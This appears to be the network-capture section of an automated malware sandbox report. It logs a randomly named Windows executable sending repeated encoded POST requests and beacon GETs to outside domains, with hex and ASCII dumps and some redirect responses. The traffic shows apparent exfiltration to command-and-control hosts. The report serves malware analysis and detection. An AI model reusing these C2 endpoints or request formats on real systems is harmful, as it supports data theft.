                        Data Raw: 6c 74 3d 46 73 33 2b 6d 75 6c 75 63 5a 43 67 79 45 4d 73 7a 32 59 73 49 50 57 2f 36 38 77 33 45 70 6e 79 2f 58 5a 59 6d 4e 4f 64 50 52 42 62 45 56 44 48 32 6a 59 6f 70 45 37 4f 42 46 71 69 75 79 57 69 41 39 4f 6e 44 44 4c 33 75 45 74 42 56 58 7a 6d 33 4e 6d 65 6c 52 49 61 4a 44 6d 64 51 78 4c 33 43 79 74 51 4a 41 6f 71 31 6e 54 4d 70 4c 59 46 6e 72 67 49 59 63 43 2f 46 43 39 33 56 4e 66 53 5a 53 62 50 77 5a 36 79 44 48 6c 59 75 72 6b 6a 34 30 78 59 4e 38 5a 4a 78 6a 72 35 44 37 53 67 32 52 79 43 4b 39 74 7a 77 73 67 35 49 30 47 38 39 73 79 6a 6a 4f 77 64 37 4b 48 39 46 33 52 71 4f 51 3d 3d
                        Data Ascii: lt=Fs3+mulucZCgyEMsz2YsIPW/68w3Epny/XZYmNOdPRBbEVDH2jYopE7OBFqiuyWiA9OnDDL3uEtBVXzm3NmelRIaJDmdQxL3CytQJAoq1nTMpLYFnrgIYcC/FC93VNfSZSbPwZ6yDHlYurkj40xYN8ZJxjr5D7Sg2RyCK9tzwsg5I0G89syjjOwd7KH9F3RqOQ==


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        18192.168.2.4497603.33.130.190802132C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe
                        TimestampBytes transferredDirectionData
                        Sep 9, 2024 04:52:53.966479063 CEST803OUTPOST /efkd/ HTTP/1.1
                        Host: www.angelenterprise.biz
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.5
                        Content-Length: 219
                        Connection: close
                        Cache-Control: no-cache
                        Content-Type: application/x-www-form-urlencoded
                        Origin: http://www.angelenterprise.biz
                        Referer: http://www.angelenterprise.biz/efkd/
                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                        Data Raw: 6c 74 3d 46 73 33 2b 6d 75 6c 75 63 5a 43 67 78 67 49 73 78 52 45 73 66 66 57 38 31 63 77 33 4f 4a 6e 32 2f 58 56 59 6d 49 2b 72 50 43 6c 62 45 31 7a 48 6b 53 59 6f 6b 6b 37 4f 59 31 71 64 67 53 57 54 41 39 4b 46 44 48 4c 33 75 41 39 42 56 56 72 6d 77 2b 4f 5a 6b 42 49 55 52 7a 6d 66 55 78 4c 33 43 79 74 51 4a 42 59 4d 31 6e 37 4d 70 61 6f 46 67 2f 30 48 52 38 43 2b 43 43 39 33 52 4e 65 62 5a 53 62 58 77 62 4f 59 44 45 4e 59 75 72 55 6a 34 6c 78 62 48 38 5a 50 2b 44 72 73 51 72 58 75 7a 7a 32 4e 4b 64 45 55 32 6f 73 6f 4a 79 58 6d 73 64 54 30 78 4f 55 75 6d 4e 4f 4a 49 30 73 6a 56 61 6f 64 35 74 6e 6d 6a 48 37 59 31 49 30 66 4c 70 76 54 64 4a 4d 3d
                        Data Ascii: lt=Fs3+mulucZCgxgIsxREsffW81cw3OJn2/XVYmI+rPClbE1zHkSYokk7OY1qdgSWTA9KFDHL3uA9BVVrmw+OZkBIURzmfUxL3CytQJBYM1n7MpaoFg/0HR8C+CC93RNebZSbXwbOYDENYurUj4lxbH8ZP+DrsQrXuzz2NKdEU2osoJyXmsdT0xOUumNOJI0sjVaod5tnmjH7Y1I0fLpvTdJM=


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        19192.168.2.4497613.33.130.190802132C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe
                        TimestampBytes transferredDirectionData
                        Sep 9, 2024 04:52:56.513890028 CEST10885OUTPOST /efkd/ HTTP/1.1
                        Host: www.angelenterprise.biz
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.5
                        Content-Length: 10299
                        Connection: close
                        Cache-Control: no-cache
                        Content-Type: application/x-www-form-urlencoded
                        Origin: http://www.angelenterprise.biz
                        Referer: http://www.angelenterprise.biz/efkd/
                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                        Data Raw: 6c 74 3d 46 73 33 2b 6d 75 6c 75 63 5a 43 67 78 67 49 73 78 52 45 73 66 66 57 38 31 63 77 33 4f 4a 6e 32 2f 58 56 59 6d 49 2b 72 50 43 74 62 45 6d 37 48 31 42 77 6f 72 45 37 4f 51 56 71 6d 67 53 57 4f 41 35 75 42 44 48 48 4a 75 43 31 42 55 32 6a 6d 78 50 4f 5a 74 42 49 55 4e 44 6d 65 51 78 4b 6a 43 32 41 59 4a 41 6b 4d 31 6e 37 4d 70 5a 77 46 32 37 67 48 64 63 43 2f 46 43 39 37 56 4e 65 7a 5a 53 44 74 77 62 61 69 43 31 74 59 75 4c 45 6a 72 6e 5a 62 4c 38 5a 4e 2f 44 71 70 51 71 72 6c 7a 7a 72 38 4b 64 42 7a 32 76 6b 6f 4c 47 61 67 30 50 54 6a 6e 39 30 4b 6b 75 75 4e 48 31 4e 68 61 5a 6b 61 32 63 72 4b 6a 55 6e 59 31 72 63 62 5a 35 58 35 4a 4d 38 45 5a 63 35 42 46 64 46 48 33 74 47 61 4e 6b 4a 64 38 56 6d 52 77 56 75 51 49 48 56 4d 34 51 74 73 72 37 4f 79 45 78 57 69 65 38 51 6e 44 51 48 78 7a 33 30 34 67 64 32 67 77 5a 43 46 4d 4b 2f 4b 76 49 6f 45 44 37 43 42 63 2f 6b 75 71 2b 74 71 6f 50 46 38 45 2b 41 4e 50 44 67 50 6d 59 77 72 43 41 45 6d 78 71 48 47 6e 76 74 39 75 58 69 4f 4d 70 68 71 6b 79 36 [TRUNCATED]
                        Data Ascii: lt=Fs3+mulucZCgxgIsxREsffW81cw3OJn2/XVYmI+rPCtbEm7H1BworE7OQVqmgSWOA5uBDHHJuC1BU2jmxPOZtBIUNDmeQxKjC2AYJAkM1n7MpZwF27gHdcC/FC97VNezZSDtwbaiC1tYuLEjrnZbL8ZN/DqpQqrlzzr8KdBz2vkoLGag0PTjn90KkuuNH1NhaZka2crKjUnY1rcbZ5X5JM8EZc5BFdFH3tGaNkJd8VmRwVuQIHVM4Qtsr7OyExWie8QnDQHxz304gd2gwZCFMK/KvIoED7CBc/kuq+tqoPF8E+ANPDgPmYwrCAEmxqHGnvt9uXiOMphqky6F17GQh/LG7Zd3zY7ySgxzTUuNdIjzDJnsP/D33J3lwIf1edVBACrzzJGSxXi8jYnsw9Jq/66c+ZLn+4S+S2WFNeNIbE90AbHdPukqagtXZ8FCp276tIQAPf0sapbc3A4C97emFbqmMvjq0f/S1ShkB2FUdlU/rzswEzGmy7p464w9UrjvmaZFqga6KJrwE1qI/75T2NZ1zwPQ8d06yfqd8yy02FFLxlaR9qY8M5HD7NokZQatZAL0jDNAwTfbWomsvQ65xtTInKMjnRq1Se66kp1MXZOh8bOBt+6DwYRckDCZ2AvbqvlaEwSrZgZG+Ztqbz2zVaDgeLStjNwIJLhhu0OptPbA6gQinNeUgHZa+ReHyCap5NGrsS4rfPqqT89LVaz7widJqYUM9m0Gq1CHOwClYvGssjofxyJ0WlcqYD7HR7U4msw8wEfdXDeDo3105AuvTwghj0uNJbspV5aaOqal68g/pqmSGA04QVFP2B0BX88xvlAgf6nrfC4too+o3YepltUfDvQPHfaOj5hE/eni6q3DjigUtz3bt7nxIg7bHyG6UuUMmAGobTuVzXO1uQ040VMXopQ/7AfzHVh7YpyuuTNblLue5RvfntU0pL2+Zsz89GhbXb3hew+ID3S8nr4E1hZfDlkFijT6RSgwcfX+zN3Fu6xCi [TRUNCATED]


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        20192.168.2.4497623.33.130.190802132C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe
                        TimestampBytes transferredDirectionData
                        Sep 9, 2024 04:52:59.051961899 CEST500OUTGET /efkd/?3ry=nj20Xr&lt=IufelbUCTKOeuwMN5EUqf6TB6ckeX6bIx1td5c35eyVbCG3IzyIKjn3SW0agpxesK9W5YHm3vT0AFFjY1MT7kmsSBjfmSD/gL3FGHQgm/hfO+eZf+Z8hf6A= HTTP/1.1
                        Host: www.angelenterprise.biz
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Language: en-US,en;q=0.5
                        Connection: close
                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                        Sep 9, 2024 04:52:59.534921885 CEST389INHTTP/1.1 200 OK
                        Server: openresty
                        Date: Mon, 09 Sep 2024 02:52:59 GMT
                        Content-Type: text/html
                        Content-Length: 249
                        Connection: close
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 33 72 79 3d 6e 6a 32 30 58 72 26 6c 74 3d 49 75 66 65 6c 62 55 43 54 4b 4f 65 75 77 4d 4e 35 45 55 71 66 36 54 42 36 63 6b 65 58 36 62 49 78 31 74 64 35 63 33 35 65 79 56 62 43 47 33 49 7a 79 49 4b 6a 6e 33 53 57 30 61 67 70 78 65 73 4b 39 57 35 59 48 6d 33 76 54 30 41 46 46 6a 59 31 4d 54 37 6b 6d 73 53 42 6a 66 6d 53 44 2f 67 4c 33 46 47 48 51 67 6d 2f 68 66 4f 2b 65 5a 66 2b 5a 38 68 66 36 41 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?3ry=nj20Xr&lt=IufelbUCTKOeuwMN5EUqf6TB6ckeX6bIx1td5c35eyVbCG3IzyIKjn3SW0agpxesK9W5YHm3vT0AFFjY1MT7kmsSBjfmSD/gL3FGHQgm/hfO+eZf+Z8hf6A="}</script></head></html>


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        21192.168.2.44976313.248.169.48802132C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe
                        TimestampBytes transferredDirectionData
                        Sep 9, 2024 04:53:04.584727049 CEST753OUTPOST /pjne/ HTTP/1.1
                        Host: www.dyme.tech
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.5
                        Content-Length: 199
                        Connection: close
                        Cache-Control: no-cache
                        Content-Type: application/x-www-form-urlencoded
                        Origin: http://www.dyme.tech
                        Referer: http://www.dyme.tech/pjne/
                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                        Data Raw: 6c 74 3d 6f 6a 42 57 44 2f 34 44 38 48 54 59 5a 4a 39 4e 42 6a 53 36 6d 62 7a 69 48 7a 57 4d 2b 56 6b 6e 35 6c 36 41 39 78 78 74 64 6b 56 58 6b 71 4b 68 30 30 6b 69 4c 44 58 32 44 65 47 50 67 4f 4a 33 65 41 71 4b 42 6d 59 77 4b 35 68 66 59 59 78 4e 71 57 52 6c 70 43 41 64 49 44 4c 64 41 6e 30 41 66 71 75 63 43 62 2b 76 6b 76 38 71 47 73 31 52 67 6f 4d 37 67 41 4e 51 4a 30 31 59 69 33 49 6e 71 44 54 76 6f 74 53 51 39 6a 62 69 47 54 41 35 6f 41 50 57 53 68 79 77 39 79 7a 77 46 72 61 32 36 69 6b 61 41 41 67 37 7a 4b 71 61 7a 75 6c 59 4f 55 2f 4d 51 2b 59 38 43 37 71 56 58 4d 66 31 4f 67 3d 3d
                        Data Ascii: lt=ojBWD/4D8HTYZJ9NBjS6mbziHzWM+Vkn5l6A9xxtdkVXkqKh00kiLDX2DeGPgOJ3eAqKBmYwK5hfYYxNqWRlpCAdIDLdAn0AfqucCb+vkv8qGs1RgoM7gANQJ01Yi3InqDTvotSQ9jbiGTA5oAPWShyw9yzwFra26ikaAAg7zKqazulYOU/MQ+Y8C7qVXMf1Og==


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        22192.168.2.44976413.248.169.48802132C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe
                        TimestampBytes transferredDirectionData
                        Sep 9, 2024 04:53:07.139619112 CEST773OUTPOST /pjne/ HTTP/1.1
                        Host: www.dyme.tech
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.5
                        Content-Length: 219
                        Connection: close
                        Cache-Control: no-cache
                        Content-Type: application/x-www-form-urlencoded
                        Origin: http://www.dyme.tech
                        Referer: http://www.dyme.tech/pjne/
                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                        Data Raw: 6c 74 3d 6f 6a 42 57 44 2f 34 44 38 48 54 59 5a 71 31 4e 44 41 36 36 7a 72 7a 6a 4c 54 57 4d 30 31 6b 6a 35 6c 2b 41 39 7a 64 39 65 52 4e 58 6c 4f 4f 68 31 78 59 69 4b 44 58 32 62 4f 47 4b 2b 2b 4a 38 65 41 76 35 42 69 51 77 4b 35 31 66 59 61 70 4e 71 68 6c 69 6f 53 41 66 46 6a 4c 66 50 48 30 41 66 71 75 63 43 62 71 4a 6b 76 6b 71 47 38 6c 52 67 4a 4d 36 2b 77 4e 66 4b 30 31 59 30 48 4a 75 71 44 54 5a 6f 75 58 4c 39 67 6a 69 47 54 77 35 70 56 6a 52 62 68 79 79 77 53 79 78 46 35 72 6c 7a 69 35 36 49 51 49 46 74 62 33 37 79 6f 30 43 66 6c 65 62 43 2b 38 50 66 38 6a 68 61 50 69 38 56 6a 6d 74 67 64 6d 32 6b 74 74 77 71 30 72 6a 6e 69 41 66 36 2b 49 3d
                        Data Ascii: lt=ojBWD/4D8HTYZq1NDA66zrzjLTWM01kj5l+A9zd9eRNXlOOh1xYiKDX2bOGK++J8eAv5BiQwK51fYapNqhlioSAfFjLfPH0AfqucCbqJkvkqG8lRgJM6+wNfK01Y0HJuqDTZouXL9gjiGTw5pVjRbhyywSyxF5rlzi56IQIFtb37yo0CflebC+8Pf8jhaPi8Vjmtgdm2kttwq0rjniAf6+I=


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        23192.168.2.44976513.248.169.48802132C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe
                        TimestampBytes transferredDirectionData
                        Sep 9, 2024 04:53:09.684768915 CEST10855OUTPOST /pjne/ HTTP/1.1
                        Host: www.dyme.tech
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.5
                        Content-Length: 10299
                        Connection: close
                        Cache-Control: no-cache
                        Content-Type: application/x-www-form-urlencoded
                        Origin: http://www.dyme.tech
                        Referer: http://www.dyme.tech/pjne/
                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                        Data Raw: 6c 74 3d 6f 6a 42 57 44 2f 34 44 38 48 54 59 5a 71 31 4e 44 41 36 36 7a 72 7a 6a 4c 54 57 4d 30 31 6b 6a 35 6c 2b 41 39 7a 64 39 65 53 74 58 6b 37 61 68 31 57 4d 69 4a 44 58 32 54 75 47 4c 2b 2b 4a 68 65 41 58 6d 42 69 63 4b 4b 39 46 66 59 2f 31 4e 73 55 4a 69 78 43 41 66 61 7a 4c 43 41 6e 31 4b 66 71 2b 59 43 62 36 4a 6b 76 6b 71 47 2b 74 52 33 49 4d 36 38 77 4e 51 4a 30 31 55 69 33 49 48 71 44 36 73 6f 76 6a 62 2b 52 44 69 47 33 55 35 76 6e 37 52 44 78 79 30 38 79 7a 69 46 35 6d 39 7a 69 56 49 49 51 4d 76 74 62 54 37 7a 2b 35 4b 49 6d 53 59 51 74 41 4c 64 4f 6a 62 44 63 79 4d 54 79 53 32 6d 4a 43 50 7a 75 31 36 6e 6d 57 4d 31 78 63 4c 6f 49 4c 73 62 61 2b 4d 52 4c 54 68 61 4a 4e 6c 38 4d 41 53 77 47 69 6e 68 4c 64 70 38 34 4d 74 32 65 48 73 52 57 7a 6a 6e 52 56 47 6b 6b 67 37 53 55 45 51 7a 4e 7a 4f 2f 6c 75 75 64 6a 74 65 39 63 4c 61 6b 49 32 7a 32 4b 69 6d 65 5a 65 2f 6c 75 4b 4b 71 48 6b 5a 54 79 47 78 38 4d 45 69 6b 68 52 70 72 35 76 37 52 6a 31 6e 78 41 32 76 6e 32 73 4e 37 45 55 76 72 53 75 [TRUNCATED]
                        Data Ascii: lt=ojBWD/4D8HTYZq1NDA66zrzjLTWM01kj5l+A9zd9eStXk7ah1WMiJDX2TuGL++JheAXmBicKK9FfY/1NsUJixCAfazLCAn1Kfq+YCb6JkvkqG+tR3IM68wNQJ01Ui3IHqD6sovjb+RDiG3U5vn7RDxy08yziF5m9ziVIIQMvtbT7z+5KImSYQtALdOjbDcyMTyS2mJCPzu16nmWM1xcLoILsba+MRLThaJNl8MASwGinhLdp84Mt2eHsRWzjnRVGkkg7SUEQzNzO/luudjte9cLakI2z2KimeZe/luKKqHkZTyGx8MEikhRpr5v7Rj1nxA2vn2sN7EUvrSuW+M5Hc/H/3wlP4QDq91tBNuS+g39j5/en6RVUyZ1pqTN7zDcYLUw36sEkeOlxNSw/Dv7kITwRqrR1TtoDGEQ8hm6R62NsOqIWOW1yDEvkJZCMh8DCOfBu7gWQ6xsByfXpa16YLYXJYHAgLVi2MQtSntOO+c0QLLb9oYlfq8tyVV/D2UrmMBx7dq6i1/mINeBGSW6gliJ/momrRZ8rg41OX+gTrD8Q1L3D5INnQMiUeLgqd17C/ua4PJzunuk8A3AQyZPPB2ftMtwWkPdclS30exRvpsSo71ZBRqRxfSKw0gAF6c3DQQNdYrloyjXlvdXDYprw897S1Z6SmatTvF/TayUUGUZZSLUKTk33yVW2E4yX2eQ0N2vie6q0QitQ1KuVuwV/ctpOO5EJt+cga1LmCqKM9QI1D8ox5tRUACZcIijG1OGNFPUQN0IRGCcnhHv7jx/F0ECcSYoyr5v2s6k9xXzhcNf6106sJkH1mjqCNDFhnUQkHi31aNoJLwuRNMza48/q4Ng4onn3CswksaXjJTmVmfJmDjNW7lBkBwYOy/DCoFOoTpbMXa26z1ABvH9uzrZ4gvrZZFnIyBw+8W0Qej5FNEuLp+MKLv5P2sxGxbk/Dsf5yXKJftF2wdrpUr1mlLfCl1Q+xuNYr6SVa8JNW/C3mHuXwvWlU [TRUNCATED]


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        24192.168.2.44976613.248.169.48802132C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe
                        TimestampBytes transferredDirectionData
                        Sep 9, 2024 04:53:12.226533890 CEST490OUTGET /pjne/?lt=lhp2AL1o8WnbXPZMRwuNwZPsCjGMimAytiXH6n0uWTdA0JaaykggGBvZUdK/udhaMgulQSxiSbl+DIpIo1gQvhEzJQCgKGJIbKmEGc+7pbgyQptTpIVqrWg=&3ry=nj20Xr HTTP/1.1
                        Host: www.dyme.tech
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Language: en-US,en;q=0.5
                        Connection: close
                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                        Sep 9, 2024 04:53:12.697207928 CEST389INHTTP/1.1 200 OK
                        Server: openresty
                        Date: Mon, 09 Sep 2024 02:53:12 GMT
                        Content-Type: text/html
                        Content-Length: 249
                        Connection: close
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6c 74 3d 6c 68 70 32 41 4c 31 6f 38 57 6e 62 58 50 5a 4d 52 77 75 4e 77 5a 50 73 43 6a 47 4d 69 6d 41 79 74 69 58 48 36 6e 30 75 57 54 64 41 30 4a 61 61 79 6b 67 67 47 42 76 5a 55 64 4b 2f 75 64 68 61 4d 67 75 6c 51 53 78 69 53 62 6c 2b 44 49 70 49 6f 31 67 51 76 68 45 7a 4a 51 43 67 4b 47 4a 49 62 4b 6d 45 47 63 2b 37 70 62 67 79 51 70 74 54 70 49 56 71 72 57 67 3d 26 33 72 79 3d 6e 6a 32 30 58 72 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?lt=lhp2AL1o8WnbXPZMRwuNwZPsCjGMimAytiXH6n0uWTdA0JaaykggGBvZUdK/udhaMgulQSxiSbl+DIpIo1gQvhEzJQCgKGJIbKmEGc+7pbgyQptTpIVqrWg=&3ry=nj20Xr"}</script></head></html>


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        25192.168.2.449767185.134.245.113802132C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe
                        TimestampBytes transferredDirectionData
                        Sep 9, 2024 04:53:17.744648933 CEST777OUTPOST /3cch/ HTTP/1.1
                        Host: www.lilibetmed.online
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.5
                        Content-Length: 199
                        Connection: close
                        Cache-Control: no-cache
                        Content-Type: application/x-www-form-urlencoded
                        Origin: http://www.lilibetmed.online
                        Referer: http://www.lilibetmed.online/3cch/
                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                        Data Raw: 6c 74 3d 4f 54 4b 72 4a 72 50 6f 58 39 4c 6a 62 34 68 53 32 37 42 63 42 31 7a 37 4d 52 4e 69 4b 6f 32 54 6f 65 45 38 4d 37 61 4f 4d 47 6c 73 30 69 4b 53 66 47 78 6b 2f 36 6a 56 69 6d 44 67 2f 67 79 35 4b 72 44 6b 45 73 74 35 57 47 48 78 79 4c 48 64 2f 5a 52 4e 43 63 44 79 72 53 63 78 4c 63 78 64 68 73 6a 74 6a 57 6b 53 48 77 5a 75 30 53 31 51 77 56 4a 6b 50 6d 49 53 38 51 4f 50 75 72 36 6b 53 78 61 58 57 6c 79 56 76 4c 56 31 58 35 61 77 5a 43 66 53 4a 6d 44 4d 51 43 77 53 2b 63 67 48 7a 58 2f 58 6f 55 49 4c 72 69 70 4c 30 46 66 31 71 43 37 6b 75 35 51 6e 73 62 71 6d 2b 33 4d 6e 42 41 3d 3d
                        Data Ascii: lt=OTKrJrPoX9Ljb4hS27BcB1z7MRNiKo2ToeE8M7aOMGls0iKSfGxk/6jVimDg/gy5KrDkEst5WGHxyLHd/ZRNCcDyrScxLcxdhsjtjWkSHwZu0S1QwVJkPmIS8QOPur6kSxaXWlyVvLV1X5awZCfSJmDMQCwS+cgHzX/XoUILripL0Ff1qC7ku5Qnsbqm+3MnBA==
                        Sep 9, 2024 04:53:18.391100883 CEST716INHTTP/1.1 405 Not Allowed
                        Server: nginx
                        Date: Mon, 09 Sep 2024 02:53:18 GMT
                        Content-Type: text/html
                        Transfer-Encoding: chunked
                        Connection: close
                        Data Raw: 32 32 38 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED]
                        Data Ascii: 228<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        26192.168.2.449768185.134.245.113802132C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe
                        TimestampBytes transferredDirectionData
                        Sep 9, 2024 04:53:20.293540001 CEST797OUTPOST /3cch/ HTTP/1.1
                        Host: www.lilibetmed.online
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.5
                        Content-Length: 219
                        Connection: close
                        Cache-Control: no-cache
                        Content-Type: application/x-www-form-urlencoded
                        Origin: http://www.lilibetmed.online
                        Referer: http://www.lilibetmed.online/3cch/
                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                        Data Raw: 6c 74 3d 4f 54 4b 72 4a 72 50 6f 58 39 4c 6a 59 62 35 53 31 63 31 63 48 56 7a 34 51 42 4e 69 44 49 32 58 6f 65 34 38 4d 36 75 65 4d 51 31 73 30 47 4f 53 63 45 5a 6b 34 36 6a 56 71 47 44 6c 69 51 79 79 4b 72 4f 5a 45 75 35 35 57 47 54 78 79 4b 33 64 2f 71 70 4f 44 4d 44 38 2b 43 63 7a 57 73 78 64 68 73 6a 74 6a 57 77 34 48 30 39 75 30 6a 46 51 7a 77 70 6c 52 32 49 52 35 67 4f 50 34 62 37 76 53 78 61 35 57 6b 65 72 76 4e 5a 31 58 38 2b 77 59 54 66 54 63 57 44 4f 50 53 78 61 35 63 55 43 2b 69 57 57 67 48 77 49 79 32 30 75 78 44 4f 76 37 7a 61 7a 38 35 30 55 78 63 6a 53 7a 30 78 75 61 43 4f 71 63 33 50 79 58 6b 5a 68 37 34 36 46 43 4b 54 58 44 79 45 3d
